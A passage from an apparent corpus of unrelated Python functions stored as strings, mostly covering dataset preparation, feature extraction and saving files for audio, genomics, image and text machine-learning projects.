self.wav_desc[\"age\"] = arrs[-1].strip(\"<\").rstrip(\">\")\r\n\r\n # step3, parse wav detailed information\r\n # key: wav_id, value: info_list, [keyword, noise_type, distance, speed,user_id, equipment]\r\n wav_infos_dict = {}\r\n with open(os.path.join(paths, \"wav_desc.txt\"), \"r\", encoding=\"utf-8\") as f:\r\n for line in f.readlines():\r\n arrs = line.strip().split(\"\\\\t\")\r\n wav_infos_dict[arrs[0].strip(\"<\").rstrip(\">\")] = [x.strip(\"<\").rstrip(\">\") for\r\n x in arrs[1:]]\r\n\r\n print(f\"Parse wav info finished find {len(wav_infos_dict)} infos.\")\r\n\r\n # Step4, audio with background noise and without nose, which was back_wav and wav_data folder\r\n for wav_folder in [\"back_wav\", \"wav_data\"]:\r\n audio_lists = glob.glob(os.path.join(paths + f\"\\\\{wav_folder}\", \"*.wav\"))\r\n for xa in audio_lists:\r\n # copy data to\r\n wav_id, user_id = get_wav_name(xa)\r\n # print(wav_id, user_id)\r\n # create md5 id\r\n utt_id = hashlib.md5(xa.encode(\"utf-8\")).hexdigest()\r\n # speaker_id = hashlib.md5(user_id.encode(\"utf-8\")).hexdigest()\r\n # print(utt_id, speaker_id)\r\n # collect all info for an audio\r\n self.wav_desc[\"utt_id\"] = utt_id\r\n infos = wav_infos_dict[wav_id]\r\n if len(infos) != 6:\r\n print(\"==>\", infos)\r\n self.wav_desc[\"keyword_id\"] = self.keywords_dict[infos[0]]\r\n self.wav_desc[\"noise_type\"] = infos[1]\r\n self.wav_desc[\"distance\"] = infos[2]\r\n self.wav_desc[\"record_speed\"] = infos[3]\r\n self.wav_desc[\"speaker_id\"] = speaker_id\r\n self.wav_desc[\"record_equipment\"] = infos[5]\r\n\r\n # record wav information\r\n t_infos = copy.deepcopy(self.wav_desc)\r\n self.all_wavs.append(t_infos)\r\n count += 1\r\n temp.append(utt_id)\r\n\r\n # copy data to resource folder\r\n dest = shutil.copy2(xa, os.path.join(self.dest_dir, f\"audios/{utt_id}.wav\"))\r\n set_index = which_set(dest, 20, 30)\r\n self.data_index[set_index].append(t_infos)\r\n\r\n # write wav information into json file\r\n with open(os.path.join(self.dest_dir, \"resources/wav_desc.json\"), \"w\", encoding=\"utf-8\") as f:\r\n json.dump(self.all_wavs, f, ensure_ascii=False, indent=True)\r\n print(f\"total wavs:{count}, total ids:{len(temp)}\")\r\n for set_index in self.data_index.keys():\r\n with open(os.path.join(self.dest_dir, f\"resources/p_{set_index}.json\"), \"w\", encoding=\"utf-8\") as f:\r\n json.dump(self.data_index[set_index], f, ensure_ascii=False, indent=True)\r\n print(f\"Collect {set_index} data total {len(self.data_index[set_index])} samples.\")", "def FeaturesGen(ChopChopresults, outputDir, sgRNA_type):\n \n #make output Directory if it does not already exist\n if not os.path.isdir(outputDir):\n os.makedirs(outputDir)\n \n #list the directory contents \n for i,j,k in os.walk(ChopChopresults): #use walk to go through and find all directories\n \n if j == []: #no subdirectories\n saveDF = pd.DataFrame() #initiate dataframe\n for target in k: #loop through to find the sgRNA sequences\n if target.endswith('.offtargets'):\n with open(os.path.join(i,target), 'r+') as f:\n guide = f.readlines()\n #add them to a dataframe\n temp = pd.Series()\n temp['guideNo'] = target.split('.')[0] + sgRNA_type\n temp['guideSeq'] = guide.pop(0).rstrip()\n \n saveDF = saveDF.append(temp.to_frame().transpose())\n saveDF['type'] = 'sgRNA'\n \n if sgRNA_type == 'General' or sgRNA_type == None:\n saveDF['fwd'] = 'pink'\n saveDF['rev'] = 'green'\n elif sgRNA_type == 'GG':\n saveDF['fwd'] = 'yellow'\n saveDF['rev'] = 'plum'\n elif sgRNA_type == 'GA':\n saveDF['fwd'] = 'cyan'\n 
saveDF['rev'] = 'cornflower blue'\n \n \n #save to txt file with tab delimiter\n saveDF.to_csv(os.path.join(outputDir, os.path.basename(i) + '_features.txt'),\\\n index = False, header = False, sep = '\\t')\n \n del saveDF", "def dump_genres_to_db() -> None:\n # TODO: connection should probably be done in a safer way\n db = database.SessionLocal()\n genres = get_genres()\n\n for key in genres:\n formatted_genre = schemas.Genre(\n id=key,\n name=genres[key],\n value=genres[key],\n )\n\n db_genre = crud.get_genre_by_id(db=db, genre_id=key)\n if not db_genre:\n crud.create_genre(db=db, genre=formatted_genre)\n db.close()", "def save_audio(ndarray, feature_name, out_path, x, y, new_labels, filename=None, sr=SR):\n # this is kind-of standard\n filename = filename or FeatureExtractor.get_file_name(x, feature_name, 'wav')\n librosa.output.write_wav(out_path / filename, ndarray, sr=sr, norm=True)\n new_labels.append([filename, y])\n print('info: {} transformed and saved!'.format(filename))\n return filename", "def save_predictions(gtfilename, loss_type, probs, preds, outfile):\n\n # 1. get file ids\n liste_fileids = []\n targets = []\n passFirstLine=True\n with open(gtfilename, 'r') as fh:\n for line in fh:\n if passFirstLine:\n passFirstLine = False\n continue\n tmp = line.rstrip().split(',')\n liste_fileids.append(tmp[0])\n targets.append(tmp[1])\n\n print 'liste_fileids', len(liste_fileids)\n # 2. save preds\n import csv\n with open(outfile, 'w') as csvfile:\n # fieldnames = ['itemid', 'hasbird', 'pred', 'gt']\n fieldnames = ['itemid', 'hasbird']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n if loss_type == 'categorical_crossentropy':\n for i, id in enumerate(liste_fileids):\n # writer.writerow({'itemid': id, 'hasbird': probs[i, 1], 'pred': preds[i], 'gt': targets[i]})\n writer.writerow({'itemid': id, 'hasbird': probs[i, 1]})\n elif loss_type == 'binary_hinge' or loss_type == 'binary_crossentropy' or loss_type == 'weighted_binary_crossentropy':\n for i, id in enumerate(liste_fileids):\n # writer.writerow({'itemid': id, 'hasbird': probs[i][0], 'pred': preds[i], 'gt': targets[i]})\n writer.writerow({'itemid': id, 'hasbird': probs[i][0]})\n\n print \"INFO: predictions (positive class probas) saved to file:\", outfile", "def create_song_feats(path):\n features = read_process_song(path, debug=True)\n df = pd.DataFrame(features)\n df.to_csv('./Features/single_song_features/song_features.csv', index=False)", "def save(self, dirname=None):\n self.genio.save(dirname)\n logging.info(\n f'Saved word vectorizations for {dirname}')", "def generate_detections(encoder, mot_dir, output_dir, detection_dir=None):\n if detection_dir is None:\n detection_dir = mot_dir\n try:\n os.makedirs(output_dir)\n except OSError as exception:\n if exception.errno == errno.EEXIST and os.path.isdir(output_dir):\n pass\n else:\n raise ValueError(\n \"Failed to created output directory '%s'\" % output_dir)\n\n for sequence in os.listdir(mot_dir):\n print(\"Processing %s\" % sequence)\n sequence_dir = os.path.join(mot_dir, sequence)\n\n # image_dir = os.path.join(sequence_dir, \"img1\")\n image_dir = sequence_dir\n image_filenames = {\n int(f[6:10]): os.path.join(image_dir, f) \n for f in os.listdir(image_dir) if os.path.isfile(os.path.join(image_dir, f))}\n\n detection_file = os.path.join(\n detection_dir, sequence, \"det/det.txt\")\n detections_in = np.loadtxt(detection_file, delimiter=' ')\n detections_out = []\n\n frame_indices = detections_in[:, 0].astype(np.int)\n min_frame_idx = 
frame_indices.astype(np.int).min()\n max_frame_idx = frame_indices.astype(np.int).max()\n for frame_idx in range(min_frame_idx, max_frame_idx + 1):\n print(\"Frame %05d/%05d\" % (frame_idx, max_frame_idx))\n mask = frame_indices == frame_idx\n rows = detections_in[mask]\n\n if frame_idx not in image_filenames:\n print(\"WARNING could not find image for frame %d\" % frame_idx)\n continue\n bgr_image = cv2.imread(\n image_filenames[frame_idx], cv2.IMREAD_COLOR)\n features = encoder(bgr_image, rows[:, 2:6].copy())\n detections_out += [np.r_[(row, feature)] for row, feature\n in zip(rows, features)]\n\n output_filename = os.path.join(output_dir, \"%s.npy\" % sequence)\n np.save(\n output_filename, np.asarray(detections_out), allow_pickle=False)", "def features_from_folder(label_folder, audio_folder, output_folder):\n print('Listing label files from folder.')\n #scan labels folder\n labels_list = os.listdir(label_folder)\n label_files = []\n for filename in labels_list:\n #get its extension\n file_extension = filename.split('.')[-1]\n if file_extension != 'txt':\n continue\n #save to without its extension\n label_files.append(filename[:-4])\n\n print('Listing audio files from folder.')\n #scan audio folder\n audios_list = os.listdir(audio_folder)\n audio_files = []\n for filename in audios_list:\n #get its extension\n file_extension = filename.split('.')[-1]\n if file_extension != 'wav':\n continue\n #save to without its extension\n audio_files.append(filename[:-4])\n\n print('Removing files without matches')\n #use only the files with matching audio/label\n files_to_process = []\n for label_file in label_files:\n if label_file in audio_files:\n files_to_process.append(label_file)\n\n print('Processing each file...')\n i = 1\n class_count = {}\n total_f = len(files_to_process)\n #for each file\n for processing in files_to_process:\n print('File', str(i) + '/' + str(total_f))\n i += 1\n\n #\n label_file = os.path.join(label_folder, processing + \".txt\")\n audio_file = os.path.join(audio_folder, processing + \".wav\")\n\n #get the segments from the corresponding label file\n segments = get_segments(label_file)\n\n #\n total_s = len(segments)\n j = 1\n #for each segment\n for segment in segments:\n print('\\tSegment', str(j) + '/' + str(total_s), segment['class'])\n j += 1\n\n if class_count.get(segment['class']) is None:\n class_count[segment['class']] = 1\n else:\n class_count[segment['class']] += 1\n output_filename = segment['class']\n output_filename += '-' + format(class_count[segment['class']], '04d')\n output_filename = os.path.join(output_folder, output_filename)\n\n #get its features\n segment_features = features_from_label(audio_file, segment)\n\n #save it to a file\n fe.write_as_bin(output_filename, segment_features)", "def retrieve_saved_data():\n \n sequences = np.load('sequences.npy')\n test_sequences = np.load('test_sequences.npy')\n labels = np.load('labels.npy')\n \n iw = []\n with open('index_word.json', 'r') as f:\n for l in f:\n iw.append(json.loads(l))\n\n index_word = iw[0]\n index_word = {int(key): word for key, word in index_word.items()}\n\n wi = []\n with open('word_index.json', 'r') as f:\n for l in f:\n wi.append(json.loads(l))\n\n word_index = wi[0]\n word_index = {word: int(index) for word, index in word_index.items()}\n \n vs = len(word_index) + 1\n \n return sequences, labels, test_sequences, word_index, index_word, vs", "def save_predictions(self, preds_all, save_dir, scale_pred=False):\n for idx, fname in enumerate(self.test_files):\n fh = open(fname, 'rb')\n 
img = pil.open(fh)\n orig_h, orig_w = self.gt_depths[idx].shape\n pred_resize = cv2.resize(preds_all[idx], (orig_w, orig_h), interpolation=cv2.INTER_LINEAR)\n if scale_pred:\n scaled_disp, _ = self.scale_depth_disp(pred_resize)\n disp_img = self.generate_disparity_img(scaled_disp)\n else:\n disp_img = self.generate_disparity_img(1./pred_resize)\n\n imgname = \"{0:04d}\".format(idx)\n name_img = os.path.join(save_dir, imgname+\".jpeg\")\n img.save(name_img)\n name_disp = os.path.join(save_dir, imgname+\"_disp.jpeg\")\n disp_img.save(name_disp)", "def save(self, filename):\n target = open(filename, 'w')\n target.write(\"\\\\data\\\\\\n\")\n target.write(\"ngram 1=\" + str(len(self.f1)) + \"\\n\\n\")\n target.write(\"\\\\1-grams:\\n\")\n for w,p in sorted(self.f1.items()): \n target.write(str(p) + \" \" + w + \"\\n\")\n target.write(\"\\\\end\\\\\\n\")\n target.close()", "def batch(dir_path: str):\n for file_name in os.listdir(dir_path):\n clf_str = get_clf_from_file_name(file_name)\n if clf_str:\n print('start get keywords text rank of file {}'.format(file_name))\n file_path = os.path.join(dir_path, file_name)\n docs_json = json.dumps(get_json(file_path))\n # note that the docs json pass to pandas.read_json() function must be type of json string,\n # never pass a json obj to it!\n clf_data = pd.read_json(docs_json, encoding='utf-8')\n yield (clf_str, get_keywords_text_rank(clf_data, 10))", "def generate_variant_dataset(self, variant):\n # process and save as torch files\n print('Generating...')\n\n if not os.path.exists(self.variant_folder):\n os.makedirs(self.variant_folder)\n\n def _rot(image_data):\n \"\"\"Destructive rotation.\"\"\"\n for i in range(image_data.shape[0]):\n rand_deg = np.random.random() * 360.0\n image_data[i] = rotate(image_data[i], rand_deg, reshape=False)\n\n def _bg_rand(image_data):\n \"\"\"Destructive random background.\"\"\"\n noise = np.random.randint(\n 0, 256, image_data.shape, dtype=image_data.dtype)\n image_data[image_data == 0] = noise[image_data == 0]\n\n for data_file in (self.training_file, self.test_file):\n # load original MNIST data\n data, targets = torch.load(os.path.join(self.processed_folder, data_file))\n\n modified_data = data.numpy() # shape: (n, 28, 28)\n if variant == 'rot':\n _rot(modified_data)\n elif variant == 'bg_rand':\n _bg_rand(modified_data)\n elif variant == 'bg_rand_rot':\n _rot(modified_data)\n _bg_rand(modified_data)\n\n with open(os.path.join(self.variant_folder, data_file), 'wb') as f:\n torch.save((torch.from_numpy(modified_data), targets), f)\n\n print('Done!')\n print('Saved dataset to %s.' 
% self.variant_folder)", "def save(self, directory):\n\n if not os.path.exists(directory):\n os.mkdir(directory)\n\n self._vocab.to_disk(os.path.join(directory, \"spacy_vocab\"))\n\n torch.save(self._model, os.path.join(directory, \"torch_model\"))", "def get_variants(cls, gen, folder):\n filename = 'temp_output{}.txt'.format(gen)\n\n with open(os.path.join(folder, filename), encoding='utf_8_sig', mode='r') as f:\n lines = f.readlines()\n\n for line in lines:\n if line.startswith('Phonemes'):\n line = line.strip()\n phonemes = line.split(':')[-1].split(',')\n if line.startswith('Allophones'):\n allophones = dict()\n line = line.strip()\n line = line.split(':')[-1]\n if not line:\n pass #no variation this turn\n else:\n line = line.split(',')\n for pair in line:\n ur,sr = pair.split('~')\n allophones[sr] = ur\n\n return phonemes,allophones", "def getTmdbGenres():\n\n #If the file is not present in the resource, creates it \n if not isfile(GENRES_FILE):\n saveTmdbGenres()\n\n return np.load(GENRES_FILE)[0]", "def preprocess_dataset(dataset_path, SAMPLES_TO_CONSIDER: int, num_mfcc = 13, n_fft = 2048, hop_length = 512):\r\n\r\n data = {\r\n 'mapping': [],\r\n 'labels': [],\r\n 'MFCCs': [],\r\n 'files': []\r\n }\r\n\r\n # loop through all sub-dirs\r\n total_samples = 0\r\n valid_samples = 0\r\n for i, (dirpath, dirname, filenames) in tqdm(enumerate(os.walk(dataset_path))):\r\n\r\n # ensure we're at sub-folder level\r\n if dirpath is not dataset_path:\r\n # save label (i.e., sub-folder name) in the mapping\r\n label = dirpath.partition('speech_commands_subset')[-1][1:]\r\n\r\n data['mapping'].append(label)\r\n print(\"\\nProcessing: '{}'\".format(label))\r\n print(\"number of files for each class: \", len(filenames))\r\n # process all audio files\r\n for f in filenames:\r\n total_samples += 1\r\n file_path = os.path.join(dirpath, f)\r\n\r\n # load audio file and slice it to ensure length consistency among different files\r\n signal, sample_rate = librosa.load(file_path)\r\n # print(signal.shape)\r\n # print(type(signal[0]))\r\n\r\n # drop audio files with less than pre-decided number of samples\r\n if len(signal) >= SAMPLES_TO_CONSIDER:\r\n valid_samples += 1\r\n # ensure consistency of the length of the signal\r\n signal = signal[:SAMPLES_TO_CONSIDER]\r\n\r\n # extract MFCCs\r\n MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc = num_mfcc, n_fft = n_fft, \r\n hop_length = hop_length) \r\n # print(MFCCs.shape)\r\n # print(type(MFCCs[0,0]))\r\n\r\n # store data for analysed track\r\n data['MFCCs'].append(MFCCs.T.tolist())\r\n data['labels'].append(i-1)\r\n # data['files'].append(file_path)\r\n # print(\"{}: {}\".format(file_path, i-1))\r\n\r\n # if valid_samples == 20:\r\n # valid_samples =0\r\n # break\r\n print(\"\\ntotal samples: \", total_samples)\r\n print(\"\\nvalid_samples: \", valid_samples)\r\n\r\n \r\n return data", "def dir_resolution(self, src_path, frag_length=128):\n src_path = os.path.join(self.root_path, src_path)\n files = os.listdir(src_path)\n\n MFCCs = None\n labels = None\n cnt = 1\n total_num = len(files)\n for wav in files:\n wav_path = os.path.join(src_path, wav)\n MFCCs_each, labels_each = self.features_and_labels(wav_path, frag_length)\n if MFCCs is not None:\n MFCCs = torch.cat((MFCCs, MFCCs_each))\n labels = torch.cat((labels, labels_each))\n else:\n MFCCs, labels = MFCCs_each, labels_each\n\n if cnt % 1000 == 0:\n print('{} data pieces have been loaded in and {} are left'.format(cnt, total_num-cnt))\n cnt += 1\n\n np.save(self.feature_file, MFCCs.numpy()) \n 
np.save(self.label_file, labels.numpy())\n print('Loading into files finished!')", "def write_files(data_dir, prefix, data):\n qf = open(os.path.join(data_dir, '%s.queries.txt'%prefix), 'w')\n gf = open(os.path.join(data_dir, '%s.gold.txt'%prefix), 'w')\n\n for q, g in data:\n qf.write(q)\n gf.write(g)\n\n qf.close()\n gf.close()", "def all_wav_to_mp3(self):\n for each_file, artist in self.past_songs_db_data:\n self.convert_wav_to_mp3(each_file)", "def main(dir_models='/Volumes/ext_ssd/jlab/data_imi_10games/saved_models', dir_out='best_models'):\n random.seed(1234)\n\n subdirs = [f for f in os.listdir(dir_models) if os.path.isdir(os.path.join(dir_models, f))]\n\n path_best_models = []\n for subdir in subdirs:\n trial_num = str(random.randint(0,49))\n\n PATH_SUB = os.path.join(dir_models, subdir, trial_num)\n PATH_BEST = os.path.join(PATH_SUB, 'ckpts/best.h5')\n\n # print(PATH_BEST, os.path.join(dir_out, subdir + '_best.h5'))\n shutil.copyfile(PATH_BEST, os.path.join(dir_out, subdir + '_best.h5'))", "def generate_vocab():\n\n vocab_dict = {}\n folder_path = os.listdir(args.f)\n for subfolder in folder_path:\n subfolder_path = os.path.join(args.f, subfolder)\n for filename in os.listdir(subfolder_path):\n with open(os.path.join(subfolder_path, filename), 'r') as file:\n read_file = file.read()\n normalised_text = re.sub(r\"[^\\s\\w]\", \" \", read_file.lower())\n vocab = normalised_text.split() #.split() creates a list of strings\n vocab_dict.update({i: 0 for i in vocab})\n return vocab_dict", "def process_docs(directory, vocab):\n for file_name in listdir(directory):\n file_path = directory + '/' + file_name\n add_doc_to_vocab(file_path, vocab)", "def save_results(PATH, data, filename):\n with open(PATH + '/' + filename + \".txt\",\"w\") as file:\n file.write(\"Results of heuristic models with mean and standard deviation.\\n\")\n for result in data:\n write_result(file, result)\n file.close()\n print('results saved in:'+ PATH + '/' + filename + \".txt\")", "def save2file(self):\n ids_input = []\n labels_input = []\n ids_path = os.path.join(self.path, 'ids')\n if not os.path.exists(ids_path):\n os.makedirs(ids_path)\n labels_path = os.path.join(self.path, 'labels')\n if not os.path.exists(labels_path):\n os.makedirs(labels_path)\n ids_total = len(self.test)\n for i in range(ids_total):\n ids_input = self.test[i][0]\n labels_input = self.test[i][1]\n file_name = \"ids/\" + str(i) + \".bin\"\n file_path = os.path.join(self.path, file_name)\n np.array(ids_input, dtype=np.int32).tofile(file_path)\n file_name = \"labels/\" + str(i) + \".bin\"\n file_path = os.path.join(self.path, file_name)\n np.array(labels_input, dtype=np.int32).tofile(file_path)\n print(\"\\n ****** Success! 
******\\n \")", "def save_wavetables(self, path: str, filename_prefix: str = '') -> None:\n for i in range(len(self.wavetables)):\n if not os.path.exists(path):\n os.mkdir(path)\n location = os.path.join(path, filename_prefix + f'{i:02d}.wav')\n wav_file = WavFile(location)\n wav_file.write_samples(self.wavetables[i])", "def import_data(hdfile, didx=0, dpath=BASE_PATH, PASS=False, dname='LMD'):\n dset = Dataset(hdfile)\n \n genres = {}\n for f in collect_mat_files(dpath,dname, didx):\n data = loadmat(f)\n g = data['genre'][0]\n print f\n if not g in genres:\n genres[g] = len(genres)\n \n if not PASS:\n x = data['features'].T\n dset.add_data(X=[x],y=[genres[g]],\n metadata=[{'filename':os.path.split(f)[-1]}])\n \n return genres", "def read_dir():\n file_list=[]\n title_list = []\n for filename in os.listdir(\"alignments/\"):\n if filename.endswith(\".aln\"): #Retrieve only alignment files.\n file_list.append(filename)\n with open (\"genID.txt\",'r') as x: #The genID.txt file contains relevant gene names.\n while True:\n rule = x.readline()\n if len(rule) > 0: #If the rule is empty, the program does not use it.\n if rule[0] == \"B\": #Only fetch gen names.\n title_list.append(rule) #The title_list is used to create the variant files in a later stadium\n else:\n break\n return file_list,title_list", "def gen_data_dir(img_dir, id_label_dict, num_class, shuffle=True):\n img_file_path = gen_img_files(img_dir, shuffle)\n return gen_data_file(img_file_path, id_label_dict, num_class)", "def samples(self):\n return glob.glob(os.path.join(self.production.rundir, \"extrinsic_posterior_samples.dat\"))", "def save_vocabulary(self, save_directory: str, filename_prefix: str = None):\n return self.tokenizer.save_vocabulary(save_directory=save_directory, filename_prefix=filename_prefix)", "def classical_search(data, primary, genre):\n __counter = 0 # count total number of songs get\n __browser = chrome_driver_setup()\n\n # read data file, extract list of artists\n artists = txt_to_list(data, delimiter=',')\n\n # for each artist, find artist id and then output list of album names\n __index = 0\n make_directory(\"results/{}\".format(primary))\n filecount = 0\n while filecount <= len(artists)//10:\n print(\"========== Starting for batch {} - {} ==========\".format(filecount*10,(filecount+1)*10))\n for artist in artists[filecount*10:(filecount+1)*10]:\n print(\" NOW FOR ARTIST: {} \".format(artist))\n aid = get_artist_id(artist)\n if aid is None:\n print(\"Cannot find artist {} in Spotify.\".format(artist))\n continue\n album_ids = get_artist_albums_classical(aid)\n for album in album_ids:\n tracks = get_album_tracks(album, 'name')\n if tracks is None:\n print(\"Artist {} has no album found in Spotify.\".format(artist))\n continue\n for track in tracks:\n if track is None or track == \"\":\n print(\"Empty track, skip...\")\n continue\n print(\"Current track: {}\".format(track))\n sleep(randint(3, 5))\n __index += 1\n link, score, title, duration = get_song_for_classical(track, __browser, genre)\n if link == \"skipped\":\n print(\"Duplicate, skip...\")\n continue\n csv_writer_append(\"results/{}/{}_{}.csv\".format(primary, genre, filecount+1),\n __index,\n track,\n title,\n link,\n score,\n duration)\n print(\"{} -- CSV done: {} {} {} {}\".format(__index, title, link, score, duration))\n print(\"\")\n print(\"||||||||||| Finished for batch {} - {} |||||||||||\".format(filecount*10,(filecount+1)*10))\n filecount += 1", "def save_encodings(output_dir, questions, candidates):\n def write_output(output_dir, prefix, 
objects):\n encodings = np.array([x.encoding for x in objects])\n ids = [x.uid for x in objects]\n with open(os.path.join(output_dir,\n \"{}_encodings.npz\".format(prefix)), \"wb\") as f:\n np.save(f, encodings)\n with open(os.path.join(output_dir,\n \"{}_uids.txt\".format(prefix)), \"w\") as f:\n for id_ in ids:\n f.write(id_ + \"\\n\")\n\n write_output(output_dir, \"question\", questions)\n write_output(output_dir, \"candidate\", candidates)", "def set_fname_encoder(self):\n\n fp = open(self.meta_path, 'r')\n wav_names = []\n next(fp)\n for i, line in tqdm(enumerate(fp)):\n audio_name, _, _, _ = line.split()\n wav_name = os.path.basename(audio_name)\n wav_names.append(wav_name)\n self.fname_encoder.fit(wav_names)", "def save_protein_pickles_and_reset_protein(self):\n self.gene_protein_pickles = {}\n for g in tqdm(self.genes):\n if g.protein.representative_sequence:\n initproteinpickle = op.join(g.protein.protein_dir, '{}_protein.pckl'.format(g.id))\n g.protein.save_pickle(initproteinpickle)\n self.gene_protein_pickles[g.id] = initproteinpickle\n g.reset_protein()\n else:\n g.reset_protein()", "def download_genotype_data():\n print(\"downloading genotype data\")\n download_from_url(PSAM_PATH, dst=f\"{GENOTYPE_DATA_PATH}/{MERGED_GENOTYPE_FILE}.psam\", desc=\"downloading psam\")\n download_from_url(PVAR_PATH, dst=f\"{GENOTYPE_DATA_PATH}/{MERGED_GENOTYPE_FILE}.pvar.zst\",\n desc=\"downloading pvar\")\n download_from_url(PGEN_PATH, dst=f\"{GENOTYPE_DATA_PATH}/{MERGED_GENOTYPE_FILE}.pgen.zst\",\n desc=\"downloading pgen\")\n decompress_genotype_file(f\"{MERGED_GENOTYPE_FILE}.pvar\")\n decompress_genotype_file(f\"{MERGED_GENOTYPE_FILE}.pgen\")", "def save_best_predictions(paths, metric):\n dir_res = '../results/'\n dir_predictions = '../results_best/predictions/'\n dir_dest = dir_predictions+metric+'/'\n\n if not os.path.exists(dir_predictions):\n os.mkdir(dir_predictions)\n\n if not os.path.exists(dir_dest):\n os.mkdir(dir_dest)\n\n for path in paths:\n dataset = path.split('/')[0].strip()\n modelo = path.split('/')[-2].strip()\n nombre = dataset + '_' + modelo + '.npy'\n\n if not os.path.exists(dir_dest + dataset):\n os.mkdir(dir_dest + dataset)\n\n shutil.copyfile(dir_res + path, dir_dest + '/' + dataset + '/' + nombre)", "def mainPSM(myPath, result_file):\n def maxQuant(my_file):\n\n peptideList = list()\n with open(my_file, \"r\") as f:\n next(f) # skip first line\n for line in f:\n peptide = line.split(\"\\t\")[0].upper().rstrip().replace(\"I\", \"J\").replace(\"L\", \"J\")\n peptideList.append(peptide)\n\n return peptideList\n\n def proteomeDiscoverer(my_file):\n\n peptideList = list()\n table = str.maketrans('', '', string.ascii_lowercase)\n with open(my_file, \"r\") as f:\n next(f) # skip first line\n for line in f:\n peptide = line.split(\"\\t\")[4].split(\".\")[1].rstrip().replace(\"I\", \"J\").replace(\"L\", \"J\")\n peptide = peptide.translate(table)\n peptideList.append(peptide)\n\n return peptideList\n\n def galaxyP(my_file):\n\n peptideList = list()\n with open(my_file, \"r\") as f:\n next(f) # skip first line\n for line in f:\n peptide = line.split(\"\\t\")[2].upper().rstrip().replace(\"I\", \"J\").replace(\"L\", \"J\")\n peptideList.append(peptide)\n\n return peptideList\n\n def MPA(my_file):\n\n peptideList = list()\n with open(my_file, \"r\") as f:\n next(f) # skip first line\n for line in f:\n peptide = line.split(\"\\t\")[2].upper().rstrip().replace(\"I\", \"J\").replace(\"L\", \"J\")\n peptideList.append(peptide)\n\n return peptideList\n\n # Open a file\n sample_db = 
os.listdir(myPath)\n # dictionary for a db1-5\n completeResultsDict = dict() # key = se; value = dict(key = dataset, value = peptidelist)\n\n # This would print all the files and directories\n for se in sample_db:\n if se not in completeResultsDict.keys():\n # sub-dictionary for a certain search pipeline\n searchEngineDict = dict() # key = dataset, value = peptidelist)\n completeResultsDict[se] = searchEngineDict\n\n for result in os.listdir(myPath + \"/\" + se):\n peptideList = list()\n if se == \"MQ\":\n peptideList = maxQuant(myPath + \"/\" + se + \"/\" + result)\n elif se == \"PD\":\n peptideList = proteomeDiscoverer(myPath + \"/\" + se + \"/\" + result)\n elif se == \"GP\":\n if result.endswith(\".tabular\"):\n peptideList = galaxyP(myPath + \"/\" + se + \"/\" + result)\n elif se == \"MPA\":\n peptideList = MPA(myPath + \"/\" + se + \"/\" + result)\n else:\n print(\"Are you sure?\")\n\n # updating the completeResultsDict\n if peptideList:\n myDict = completeResultsDict.get(se)\n myDict[result.split(\".\", maxsplit=1)[0]] = peptideList\n\n # nested for-loop: {search engine: {dataset : peptidelist}}\n nonRedundantPeptideSet = set()\n count = 0\n for se, result in completeResultsDict.items():\n for dataset, peptides in result.items():\n for peptide in peptides:\n nonRedundantPeptideSet.add(peptide)\n count += 1\n nonRedundantPeptideList = sorted(list(nonRedundantPeptideSet))\n\n peptideMatrix = dict()\n peptideMatrix[\"PeptideSeq\"] = nonRedundantPeptideList\n headerList = list()\n headerList.append(\"se_dataset\")\n for se, result in completeResultsDict.items():\n print(se)\n for dataset, peptides in result.items():\n print(dataset)\n headerList.append(\"{}_{}\".format(se, dataset))\n peptideList = []\n for peptide in nonRedundantPeptideList:\n if peptide in peptides:\n peptideList.append(1)\n else:\n peptideList.append(0)\n peptideMatrix[\"{}_{}\".format(se, dataset)] = peptideList\n\n\n df = pandas.DataFrame(data=peptideMatrix)\n df.to_csv(open(result_file, \"w\", newline=''), index=False)", "def per_sample_dot_files(self):\n # The output directory #\n directory = DirectoryPath(self.a.out_dir+'per_sample_ontology/')\n directory.create_if_not_exists()\n # Main loop #\n for i, sample in self.df_sample_concepts.iteritems():\n # File path #\n sanitized_name = \"\".join([c for c in sample.name if re.match(r'\\w', c)])\n dot_path = directory + sanitized_name +'.dot'\n pdf_path = directory + sanitized_name +'.pdf'\n # Counts #\n counts = sample / sample.sum()\n counts = dict(counts)\n envos = counts.keys()\n # Skip sample if it has no counts #\n if sample.sum() == 0: continue\n # Make graph #\n graph = self.a.ontology.get_subgraph(envos)\n graph = self.a.ontology.add_weights(graph, counts)\n graph = self.a.ontology.add_style(graph)\n # Write output #\n self.a.ontology.write_to_dot(graph, dot_path)\n self.a.ontology.add_legend(dot_path)\n self.a.ontology.draw_to_pdf(dot_path, pdf_path)", "def _generate_examples(self, data_dir_path):\n for file_name in tf.io.gfile.listdir(data_dir_path):\n if file_name.endswith(\".png\"):\n image = os.path.join(data_dir_path, file_name)\n angle_label = file_name.split(\"_\")[2].split(\".\")[0]\n object_id = file_name.split(\"_\")[0]\n yield file_name, {\n \"image\": image,\n \"angle_label\": angle_label,\n \"object_id\": object_id,\n \"angle\": int(angle_label),\n }", "def process_docs(directory, vocab):\n for filename in listdir(directory):\n if not filename.endswith('.txt'):\n continue\n path = directory + '/' + filename\n add_doc_to_vocab(path, vocab)", 
"def score_all_genes(self):\n scores = pd.DataFrame(self.clf.predict_proba(self.dataset), index=self.dataset.index)[1]\n scores = pd.DataFrame(scores).sort_values(1, ascending=False)\n scores['known'] = [int(g in list(self.M.befree_genes + self.M.curated_genes + self.M.sven_genes)) for g in scores.index]\n scores.columns = ['score', 'known']\n scores.to_csv(self.save_path + '/all_gene_scores.csv')\n\n predictions = pd.DataFrame(self.clf.predict(self.dataset), index=self.dataset.index)\n predictions['known'] = [int(g in list(self.M.befree_genes + self.M.curated_genes + self.M.sven_genes)) for g in predictions.index]\n predictions.to_csv(self.save_path + '/predictions.csv')", "def prepare_voicebank(\r\n data_folder, save_folder, valid_speaker_count=2, skip_prep=False\r\n):\r\n\r\n if skip_prep:\r\n return\r\n\r\n # Setting ouput files\r\n save_json_train = os.path.join(save_folder, TRAIN_JSON)\r\n save_json_valid = os.path.join(save_folder, VALID_JSON)\r\n save_json_test = os.path.join(save_folder, TEST_JSON)\r\n\r\n # Check if this phase is already done (if so, skip it)\r\n if skip(save_json_train, save_json_test, save_json_valid):\r\n logger.info(\"Preparation completed in previous run, skipping.\")\r\n return\r\n\r\n train_clean_folder = os.path.join(\r\n data_folder, \"clean_trainset_28spk_wav_16k\"\r\n )\r\n train_noisy_folder = os.path.join(\r\n data_folder, \"noisy_trainset_28spk_wav_16k\"\r\n )\r\n train_txts = os.path.join(data_folder, 